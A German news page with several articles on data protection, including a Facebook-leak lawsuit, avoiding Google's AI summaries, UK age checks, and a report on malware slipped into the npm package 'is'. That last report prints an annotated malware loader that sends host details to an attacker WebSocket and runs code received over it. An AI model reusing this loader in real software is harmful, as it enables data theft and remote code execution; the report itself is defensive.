Connect with us

Datenschutz & Sicherheit

Meta muss mir 250 Euro zahlen – dir auch?


Ich gestehe, ich habe einen Facebook-Account. Und um es noch peinlicher zu machen: Dieser Facebook-Account ist mit meiner Handynummer verknüpft. Ich wollte Facebook nie meine Nummer geben. Ich nutze es auch schon ewig nicht mehr. Aber eines Tages wollte ich doch mal wieder rein, um eine Person zu kontaktieren, zu der ich keinen anderen Kontakt hatte.

Facebook stellte mich vor die Wahl: Personalausweiskopie oder Handynummer. Es gab keine andere Möglichkeit, um Zugang zu erhalten. Dann eben die Handynummer, dachte ich. Das hat sich gerächt.

2021 sind Daten von rund 530 Millionen Facebook-Mitgliedern außerhalb Facebooks aufgetaucht. Sie wurden wohl durch eine Sicherheitslücke gestohlen, die bis Sommer 2019 offen stand. Damals waren Daten wie Name, Handynummer, E-Mail-Adresse, Wohnort, Beziehungsstatus, Geschlecht und Geburtsdatum ungeschützt abrufbar. Von mir findet man beispielsweise Name, Geschlecht und Handynummer im Netz.

Ominöse Jobangebote und eine Vielzahl von Hallos

Jetzt bekomme ich regelmäßig ominöse Jobangebote auf mein Telefon oder Anfragen von Menschen, die mich angeblich als Guide buchen wollen für ihre Deutschlandtour oder auch einfach nur „Hallo“ schreiben. Viele dieser Anfragen kommen von Accounts, deren Profilfotos junge Frauen zeigen.

Die Unterhaltungen lassen sich mit einem Tippen löschen und die Accounts blockieren und melden. Schwieriger wird es, wenn die Menschen, die versuchen, mich zu scammen, mich anrufen. Denn dann muss ich rangehen oder zurückrufen. Es könnte ja eine Quelle sein, die eine neue Geschichte für mich hat.

Ich arbeite seit bald 30 Jahren mit dieser Telefonnummer. Ich kann sie nicht einfach wechseln, weil ich nicht von allen Menschen, die mich möglicherweise als Journalisten kontaktieren wollen, einen Kontakt habe. Also hebe ich gelegentlich auch für Scammer ab.

So schließt man sich der Sammelklage an

Ich finde, Mark Zuckerbergs Konzern Meta, dem Facebook ja gehört, schuldet mir dafür eine Entschädigung. Deshalb habe ich geklagt. Es gibt mehrere Kanzleien, die Menschen vertreten, deren Datenschutzrechte durch den Facebook-Leak verletzt wurden, WBS.LEGAL zum Beispiel. Ich habe Dr. Stoll & Sauer gewählt, die Kanzlei klagt auch für den Verbraucherzentrale Bundesverband (vzbv) gegen Meta.

Dieser Musterfeststellungsklage haben sich bereits etwa 11.000 Menschen angeschlossen. Die Teilnahme kostet nichts und gibt die Hoffnung, ebenfalls Geld von Meta zu erhalten. Ob du berechtigt bist, teilzunehmen, zeigt der „Klage-Check“ des vzbv. Ob deine Telefonnummer dank Facebook im Internet kursiert, erfährst du im „Datenleak-Check“ von Dr. Stoll & Sauer.

Die mündliche Verhandlung ist am 10. Oktober. Bis drei Wochen danach kann mensch sich der Sammelklage noch anschließen. Sechs Millionen Menschen aus Deutschland steht womöglich ein Schmerzensgeld zu, denn so viele deutsche Telefonnummern finden sich in dem Leak. Betroffen sind potenziell alle, die 2019 und früher ein Facebook-Konto hatten.

Anspruch auf mindestens 100 Euro

Laut Bundesgerichtshof rechtfertigt allein der Kontrollverlust über die persönlichen Daten einen Schadensersatz von 100 Euro, unabhängig von tatsächlichen Schäden. Henning Fischer, der die Sammelklage für den vzbv betreut, hofft, „dass derartige Verfahren Meta motivieren, den Datenschutz ernster zu nehmen“.

Ich habe als Einzelperson gegen Facebook geklagt. Obwohl die Fälle seit Anfang 2025 eigentlich als verjährt gelten, gebe es weiterhin rechtliche Möglichkeiten, auch als Einzelne*r den Kampf aufzunehmen, sagt Christian Grotz, Geschäftsführer von Dr. Stoll & Sauer. Das lohne sich, wenn man besondere Nachteile durch das Datenleck gehabt habe und bereit sei, persönlich vor Gericht aufzutreten.


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

„Es wurde insbesondere ihr persönliches Erscheinen angeordnet“, steht im Schreiben des Landgericht Berlin II. Sollte ich nicht auftauchen, könne gegen mich ein Ordnungsgeld von 1.000 Euro festgesetzt werden. Eine Stunde bevor es losgehen soll, ruft mich mein Anwalt an. Er sagt, es reiche völlig, wenn ich mich per Videotelefonat einwähle. Vermutlich käme ich sowieso nicht zu Wort.

Wie Meta versucht, sich herauszuwinden

Also wähle ich mich ein. Der zuständige Richter sitzt in einem schmalen schlauchförmigen Raum, der extrem hallt. Die beiden zugeschalteten Anwälte sind ebenfalls kaum zu verstehen. Was ich mitbekomme: Der Meta-Vertreter versucht, den Fall für verjährt zu erklären. Die Klage sei im März 2025 zugestellt worden, ich hätte aber seit 2021 Kenntnis von dem Datenleck gehabt. Außerdem könne meine Nummer gleichzeitig auch anderswo frei im Netz erhältlich gewesen sein.

Der Meta-Vertreter bestreitet zudem die zeitliche Anwendbarkeit der Datenschutzgrundverordnung. Es sei möglich, dass der Datenverlust vor deren Inkrafttreten im Jahr 2018 stattgefunden habe. Und es sei nicht ersichtlich, ob die Screenshots, die ich von Spamanrufen in meiner Anrufliste machte, überhaupt Spamanrufe zeigten, und ob diese wirklich bei meiner Nummer eingegangen seien. All das sieht der Richter nicht ein. Wohl aber, dass der Datenverlust aufgrund meines Berufs besonders schwer wiegt. 250 Euro muss Meta mir zahlen, beschließt er, ohne mich anzuhören.

Gekostet hat meine anwaltliche Vertretung bislang 517,65 Euro brutto, so Grotz. Finanziell gelohnt hat sich der Kampf nicht. Aber mir geht es auch mehr darum, Meta mit dem Geschäftsgebaren nicht ungeschoren davonkommen zu lassen. Außerdem zahlt meine Rechtsschutzversicherung die Kosten. Und gerade prüft sie, ob sie bereit ist, mich auch in einer Berufung zu unterstützen. Grotz meint, ich könne noch mehr Geld von Meta erstreiten. Es ist aber auch möglich, dass Meta selbst in Berufung geht, weil der Konzern weiterhin gar nichts zahlen will.

vzbv will 600 Euro pro Person erklagen

Dr. Stoll & Sauer vertritt Fälle wie meinen mit Hilfe von Legal Tech: Eingabemasken, Textbaukästen, standardisierte Akten, KI-Texterkennung, automatisierte Fallbearbeitung. Gegen Facebook klagte Dr. Stoll & Sauer im Namen von 500 Menschen, es fielen 326 Urteile in erster Instanz und 33 in zweiter. Ergebnis: Zwischen null und 3.000 Euro für die Betroffenen.

In der parallelen Sammelklage, an der Verbraucher*innen sich kostenlos beteiligen können, hält der vzbv eine Entschädigung von mindestens 600 Euro für angemessen, wenn beispielsweise neben Facebook-ID, Name und Telefonnummer auch Wohnort, E-Mail-Adresse, Geburtsdatum sowie Beziehungsstatus öffentlich geworden sind. „Mit der Musterfeststellungsklage kann man seinen eigenen Anspruch sichern und sich zurücklehnen“, sagt Grotz. Er findet: „Man muss einen Großkonzern nicht mit so was durchkommen lassen. Wenn die Verbraucher*innen in ausreichend großer Masse aufstehen, ändert sich da was.“



Source link

Weiterlesen
Kommentar schreiben

Leave a Reply

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Datenschutz & Sicherheit

Googles „Übersicht mit KI“ abstellen, so gehts


Seit März 2025 ist die sogenannte „Übersicht mit KI“ auch in Deutschland vollständig in der Google-Suche integriert. Google bietet direkt unter der Suchleiste eine per Sprachmodell generierte Zusammenfassung der Suchergebnisse an, „um schneller und einfacher“ zu Suchergebnissen zu kommen, so Google selbst.

Jedoch sind die Antworten der KI-Übersicht nicht verlässlich: Die Google-KI kann „unrichtige oder anstößige Informationen liefern. Bei Übersichten mit KI können und werden Fehler vorkommen“, wie der Konzern erklärt. Die „Übersicht mit KI“ sei eine Kernfunktion der Google-Suche und ließe sich deswegen nicht direkt deaktivieren.

Es gibt aber aktuelle Möglichkeiten, die KI-Übersicht dauerhaft zu meiden. Sie können je nach Browser variieren – und ob sie auf Dauer funktionieren, hängt von Google ab. Noch bietet Google selbst eine Ansicht der Suchergebnisse ohne KI, allerdings ein wenig versteckt: Bereits im Mai 2024 führte Google hierfür einen neuen Reiter mit dem Namen „Web“ ein, zusätzlich zu  den Reitern „Bilder“, „Videos“ und „News“. Manchmal befindet sich dieser Reiter hinter dem Aufklapp-Menü „Mehr“ am Ende der Auflistung.

Nach dem Googeln auf diesen Reiter zu klicken ist eine Möglichkeit, die KI-Übersicht zu meiden. Wer sich jedoch das dauerhafte Klicken sparen möchte, kann sich zumindest in manchen Browsern direkt diesen Web-Reiter anzeigen lassen. Das heißt, man bekommt nach einer Suchanfrage sofort die Ergebnisse ohne KI-Zusammenfassung serviert.

Benutzerdefinierte Suchmaschine anlegen

Bildschirmfoto von Firefox zeigt den im Text beschriebenen Weg
So kann es bei Firefox aussehen. – Alle Rechte vorbehalten Screenshot: Firefox

Um Googles KI-Zusammenfassung zu umgehen, lässt sich in den Browser-Einstellungen bei Firefox und Chrome eine benutzerdefinierte URL für Suchmaschinen festlegen.

Bei Chrome funktioniert die Umstellung in sieben Schritten:


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

  • Mit einem Klick auf das Drei-Punkte-Symbol in der Browser-Leiste öffnen sich die Browser-Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suchmaschinen“ die Suchmaschinen-Einstellungen.
  • Dort auf „Suchmaschinen und die Websitesuche verwalten“ klicken.
  • Unter „Websitesuche“ lässt sich ein neuer Eintrag mit dem Button „Hinzufügen“ anlegen.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name“ und „Kürzel“ können frei gewählt werden. Wichtig ist nur unter „URL“ folgendes Eingabe: {google:baseURL}/search?udm=14&q=%s
  • Mit Klick auf den Button „Hinzufügen“ wird dieser neue Eintrag gespeichert.
  • In der Auflistung der Suchmaschinen, direkt hinter dem neuen Eintrag, muss im Drei-Punkte-Menü noch die Option „Als Standard festlegen“ angeklickt werden.

Diese Änderung lässt sich auch schnell wieder rückgängig machen, indem man Google wieder als Standardsuchmaschine festlegt.

Bei Firefox funktioniert die Umstellung ähnlich einfach:

  • Ein Klick aufs Burger-Symbol in der Browserleiste öffnet die Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suche“ die Suchmaschinen-Einstellungen.
  • Unten auf der Seite bei „Suchmaschinen-Schlüsselwörter“ legt ein Klick auf „Hinzufügen“ einen neuen Eintrag an.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name der Suchmaschine“ und „Schlüsselwort“ sind frei wählbar. Wichtig ist, unter „URL mit %s anstelle des Suchbegriffs“ Folgendes einzugeben:
  • Mit Klick auf „Suchmaschine hinzufügen“ wird dieser neue Eintrag gespeichert.
  • Oben auf der Seite unter „Standardsuchmaschine“ lässt sich im Drop-Down-Menü die neu angelegte Suchmaschine als Standard-Suchmaschine festlegen.

In diesem Drop-Down-Menü kann man die Standardsuchmaschine auf Wunsch auch wieder ändern.

Bei Safari ist es nicht möglich, benutzerdefinierte Suchmaschinen anzulegen, ohne weitere Apps oder Add-ons zu installieren.

„Übersicht mit KI“ verändert Browsing-Verhalten

Kürzlich veröffentlichte das US-Meinungsforschungsinstitut Pew Research Center eine Studie zum Online-Suchverhalten von 900 Teilnehmer*innen. Dabei fanden die Wissenschaftler*innen heraus, dass die „Übersicht mit KI“ deutliche Auswirkungen hat. Erscheint bei einer Suche mit Google eine KI-Zusammenfassung, ist demnach die Wahrscheinlichkeit geringer, dass Suchende noch auf Links zu weiterführenden Webseiten klicken. Außerdem würden Google-Nutzende öfter ihre Browsing-Session beenden, nachdem eine KI-Zusammenfassung auftaucht. Auch andere Studien bestätigen diesen Effekt. Viele sehen in dieser Entwicklung deshalb eine Bedrohung für werbefinanzierte Webseiten, da Aufrufzahlen und somit Einnahmen sinken.

Eine andere Möglichkeit, die „Übersicht mit KI“ zu umgehen, ist die Suchmaschine zu wechseln. In der alternativen Suchmaschine „DuckDuckGo“ gibt es zwar auch eine KI-Zusammenfassung; sie lässt sich jedoch direkt in den Einstellungen der Suchmaschine ausstellen. Außerdem legt der US-Anbieter größeren Wert auf Privatsphäre der Nutzenden. In den Datenschutzbestimmungen von DuckDuckGo heißt es: „Wir speichern und teilen Ihre Such- und Browserverläufe nicht“. Hier berichten wir ausführlicher über alternative Suchmaschinen.



Source link

Weiterlesen

Datenschutz & Sicherheit

Pornhub beugt sich britischen Alterskontrollen


Ab heute, dem 25. Juli, müssen Plattformen mit potenziell für Kinder schädlichen Inhalten das Alter britischer Nutzer*innen kontrollieren. Die Grundlage dafür ist der Online Safety Act, durchgesetzt von der dortigen Medienaufsicht Ofcom.

Pornhub-Mutterkonzern Aylo, eines der weltgrößten Porno-Unternehmen, zieht mit und betont in feinster PR-Prosa, sich schon seit Jahren für das Thema eingesetzt zu haben. Andernorts, in Deutschland und Frankreich etwa, wehrt sich Pornhub erbittert gegen ähnliche Vorstöße vor Gericht. Denn auch in der EU drängen Politik und Behörden auf rigorose Altersschranken.

Großbritannien geht hier mit schlechtem Beispiel voran. Der Blick zum ehemaligen EU-Land lohnt sich, um zu sehen, wie man es nicht machen sollte.

Zu den in Großbritannien amtlich empfohlenen Methoden der Alterskontrolle gehören etwa der Upload von Ausweisdokumenten oder biometrische Gesichtsscans. Auch über Banken oder mithilfe von Kreditkarten können Nutzer*innen ihr Alter nachweisen. Betroffen sind nicht nur Pornoseiten, sondern ebenso andere Plattformen mit potenziell nicht jugendfreien Inhalten, darunter Reddit, Discord, Bluesky oder Grindr.

Behörde warnt vor Hürden, die sie selbst errichtet hat

Die von der Ofcom empfohlenen Methoden zur Alterskontrolle, die auf Dokumenten basieren, schließen nicht nur Menschen ohne Papiere aus – sie sind auch eine Gefahr für Datenschutz und Privatsphäre. Nicht minder bedenklich sind biometrische Gesichtsscans, denn Biometrie ist ähnlich invasiv.

Mithilfe von biometrischen Gesichtersuchmaschinen wie Clearview AI oder PimEyes lassen sich Menschen allein anhand ihres Gesichts identifizieren. Hinzu kommt potenzielle Diskriminierung: KI-basierte Systeme, die das Alter anhand des Gesichts abschätzen, machen Fehler, insbesondere bei Personen aus Gruppen, die in den Trainingsdaten unterrepräsentiert sind.

Es mutet zynisch an, wenn die britische Medienaufsicht selbst auf einer Infoseite schreibt:

Sie sollten bei der Weitergabe persönlicher Informationen ein gewisses Maß an Vorsicht und Urteilsvermögen walten lassen.

Die Behörde warnt also vor den Hürden, die sie selbst errichtet hat. Aus gutem Grund pocht die EU-Kommission in ihren Leitlinien zu Alterskontrollen auf Datensparsamkeit und Anonymität. Wobei nach wie vor zweifelhaft ist, ob sich die EU auch an ihre eigenen Maßstäbe halten wird.

Kontrollen lassen sich kinderleicht umgehen

Bei aller Kritik am „Wie“ von Alterskontrollen kann die Frage nach dem „Ob“ schnell in Vergessenheit geraten. Denn Fachleute für Medienpädagogik und für digitale Grundrechte hinterfragen, dass solche strengen Altersschranken überhaupt eingesetzt werden – auch im Interesse der Jugendlichen selbst. Der Grund: Minderjährige brauchen gute Infoangebote statt Verbote; sie brauchen vertrauensvolle Ansprechpersonen statt Ausweiskontrollen. Die leicht umgehbaren Kontrollsysteme bieten nur eine trügerische Sicherheit.

Die offenkundige Ignoranz gegenüber solchen Einwänden legt den Verdacht nahe, dass bei der beharrlich betriebenen Alterskontroll-Politik andere Motive eine Rolle spielen. So könnte es bei manchen Wähler*innen einen Eindruck von Durchsetzungskraft und Stärke hinterlassen, wenn Politik und Behörden Tech-Konzerne zum Einlenken bringen. Zudem dürfte ein Internet mit mehr Kontrollen und Datenspuren, mit weniger Anonymität und Freiheiten all jenen gefallen, die seit Jahrzehnten Überwachungsfantasien hegen.

Überwachungsfantasie ist das Stichwort für die Gefahr hinter der britischen Symbolpolitik. Stand aktuell werden die hart erkämpften Alterskontrollen keinen einzigen britischen Jugendlichen von Pornos fernhalten. Mit simplen Mitteln wie VPN-Software oder dem Tor-Browser lassen sich die Kontrollen kinderleicht umgehen. Sie verfehlen ihren angeblichen Zweck.

Die BBC zitiert einen britischen Nutzer, der ironisch von einer „schweren“ Entscheidung spricht: „Na klar gebe ich meine sensiblen Daten einfach irgendeinem unbekannten, nicht überprüften Unternehmen – oder… ich benutze eben ein VPN.“ Der Nutzer steht damit stellvertretend für viele andere. Auch in US-Bundesstaaten ging die VPN-Nutzung durch die Decke, nachdem deren Regierungen Pornoseiten zur Einführung von Alterskontrollen gedrängt hatten.

Medienaufsicht will Infos über VPNs einschränken

Wenig sinnvolle Alterskontrollen, die sich auch noch leicht umgehen lassen: Die Geschichte der britischen Alterskontrollen könnte eine Komödie sein, wenn sie an dieser Stelle enden würde. Das tut sie aber nicht.


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

Die Einführung der Alterskontrollen könnten sich nämlich nur als der erste Akt einer Tragödie erweisen, um Stück für Stück Anonymisierungs-Dienste wie VPN-Software oder Tor zu kriminalisieren. Solche Dienste gehören in den Werkzeugkasten digitaler Selbstverteidigung, um Grundrechte wie Datenschutz, Privatsphäre oder Informationsfreiheit zu wahren und Zensur zu umgehen. Wer ein VPN nutzt, verschleiert gegenüber dem eigenen Internet-Zugangsanbieter und dem Website-Betreiber die tatsächliche Herkunft; vertraut diese Informationen jedoch dem VPN-Anbieter an.

Der britischen Medienaufsicht sind VPN-Dienste jetzt schon ein Dorn im Auge, wie aus einer Leitlinie für Betreiber von Pornoseiten hervorgeht. Demnach sollen die betroffenen Seiten keine Inhalte zulassen, die Minderjährige dazu anleiten oder ermutigen, Zugangskontrollen zu umgehen. Verboten sind demnach „Informationen über oder Links zu einem Virtual Private Network (VPN)“.

Weg in eine düstere Zukunft

Solche Formulierungen erinnern auf beklemmende Weise an Gesetze aus autoritären Staaten, die den Zugang zur Informationen und damit die Meinungsfreiheit kontrollieren wollen. Zum Beispiel hat der Iran die Nutzung von VPN-Diensten verboten. Der russische Staat sperrt VPN-Dienste, die nicht mit Behörden kooperieren wollen.

Von den Ofcom-Leitlinien zu einem veritablen VPN-Verbot mag es noch ein langer Weg sein. Zunächst sollen es Pornoseiten ihren britischen Nutzer*innen lediglich nicht unter die Nase reiben, wie man ihre Kontrollen umgeht. Ohne Blick aufs große Ganze könnte man das als schlüssig betrachten. Allerdings ebnet es den Weg für radikalere Vorstöße.

Grassierende Alterskontrollen können also in eine düstere Zukunft führen, in der eines Tages auch in Großbritannien und der EU ernsthaft über die Kriminalisierung von VPN-Diensten diskutiert wird – natürlich nur im Namen des Jugendschutzes. Politiker*innen, die nach einem lückenlos überwachten Internet trachten, könnten mit gespielter Überraschung anprangern, dass die Alterskontrollen ja gar nicht wirksam sind und man da doch etwas unternehmen müsse. Sonst wären die jahrelangen Bemühungen umsonst gewesen; das dürfe man den Kindern nicht antun.

Und plötzlich stehen dann die Grundrechte von allen auf dem Spiel, die sich aus gutem Grund vor kommerzieller und staatlicher Überwachung im Netz schützen müssen, darunter Journalist*innen und Aktivist*innen, Dissident*innen und Oppositionelle, verfolgte Minderheiten, Whistleblower*innen und so weiter.

Währenddessen hilft niemand jungen Menschen, die einfach nur mehr darüber wissen wollen, wie Lust, Sex und Einvernehmlichkeit funktionieren. Dafür bräuchte es nicht etwa Beschäftigung mit Seiten wie Pornhub, sondern unverklemmte, der Entwicklung angemessene Angebote für sexuelle Aufklärung.



Source link

Weiterlesen

Datenschutz & Sicherheit

Beliebtes JavaScript-Paket is: Malware durch Supply-Chain-Angriff


Ein Software-Supply-Chain-Angriff hat das beliebte JavaScript-Paket is getroffen, das es auf knapp 2,7 Millionen Downloads pro Woche bringt.

Der Maintainer Jordan Harband schreibt auf Bluesky, dass Angreifer den Account eines anderen Projektverantwortlichen übernommen hatten. Betroffen sind die Versionen 3.3.1 und 5.0.0 des Pakets.

Empfohlener redaktioneller Inhalt

Mit Ihrer Zustimmung wird hier ein externer Inhalt geladen.

Heads up that v3.3.1 of npmjs.com/is has malware in it, due to another maintainer’s account being hijacked. They’re removed for now, v3.3.0 is set at latest, v3.3.1 is deprecated, and a v3.3.2 will be published once I’m not on my phone (thx @github.com codespaces)

[image or embed]

— Jordan Harband (@jordan.har.band) Jul 19, 2025 at 20:21

Beide Versionen waren offenbar nur wenige Stunden im Umlauf. Inzwischen ist auf der npm-Seite die Version 3.3.2 verfügbar, die keinen Schadcode erhält. Als Übergang hatte Harband die neueren Releases für deprecated erklärt und 3.3.0 als letzte aktive Version markiert, damit Prozesse, die automatisch die jüngste Version eines JavaScript-Pakets von npm anfordern, nicht weiter den Schadcode herunterladen.

Bei is handelt es sich um eine Testing-Library, die unter anderem überprüft, ob ein Wert definiert (is.defined), leer (is.empty) oder von einem bestimmten Typ (generell über is.type(value, type) oder speziell als is.integer, is.bool, is.array etc.) ist.


enterJS Web Security Day

enterJS Web Security Day

(Bild: Alexander Supertramp/Shutterstock.com)

Neun von zehn Webanwendungen haben Sicherheitslücken – höchste Zeit für Web Developer, zu handeln. Auf dem ersten enterJS Web Security Day am 9. Oktober 2025 geht es um automatisierte Sicherheitsprüfungen, den Einsatz von Passkeys und den Schutz vor KI-basierten Angriffen.

Offenbar war dieselbe Angreifergruppe erfolgreich, die mit einer Phishing-Attacke zuvor zahlreiche npm-Maintainer getroffen und bereits die Pakete eslint‑config‑prettier, eslint‑plugin‑prettier, synckit@0.11.9, @pkgr/core, napi‑postinstall und got-fetch mit Schadcode versehen hatte.

Der Angriff auf die anderen Pakete zielte mit einer DLL nur auf Windows. Ein Blogartikel auf Invoke RE beschreibt die in dem Paket eslint‑config‑prettier gefundene Scavenger-Malware genauer.

Der Malware-Loader im is-Paket schlägt dagegen plattformübergreifend unter Windows, macOS und Linux zu.

Ein Blogbeitrag des Security-Softwareunternehmens Socket beschreibt die Arbeitsweise des verschleierten JavaScript-Codes. Der Loader erstellt die Payload demnach vollständig im Speicher des betroffenen Systems und legt den dekodierten Schadcode mittels new Function() als eigene Funktion an.

Diese Funktion fragt schließlich zahlreiche Details wie den Hostnamen, das Betriebssystem, Details zur CPU und Umgebungsvariablen von process.env ab. Schließlich nutzt sie die Library ws, um eine WebSocket-Verbindung aufzubauen und die Daten zu übertragen.

Das Security-Team von Socket hat den entschleierten Schadcode mit Kommentaren versehen, die die Funktionen beschreiben:


// Expose Node's `require`, even in restricted contexts (e.g., Electron)
get "switch"() { return require; }

// Load system and networking modules dynamically
const os = this["switch"]("os");
const WS = this["switch"]("ws");

// Connect to threat actor-controlled WebSocket endpoint
const sock = new WS("wss://");

// Send host fingerprinting data on connect
sock.onopen = () => sock.send(JSON.stringify({
  host: os.hostname(),
  plat: os.platform(),
  cwd : process.cwd()
}));

// Execute threat actor-supplied code received over the socket
sock.onmessage = ({ data }) => {
  new Function(data)();  // remote code execution
};


Im letzten Abschnitt ist erkennbar, dass der Schadcode mit der WebSocket-Verbindung eine Remote Shell aufbaut: Er führt den empfangenen JavaScript-Code direkt über new Function() aus. Der aufgerufene Code hat dieselben Rechte wie der Host-Prozess, sodass er üblicherweise direkten Zugriff aufs Dateisystem und den Netzwerkverkehr hat.

Wer die Library einbindet, sollte sicherstellen, dass keine der infizierten Varianten auf den Rechner gelangt sind. Es ist zudem davon auszugehen, dass die Angreifergruppe weitere JavaScript-Maintainer im Fokus hatte oder hat.


(rme)



Source link

Weiterlesen

Beliebt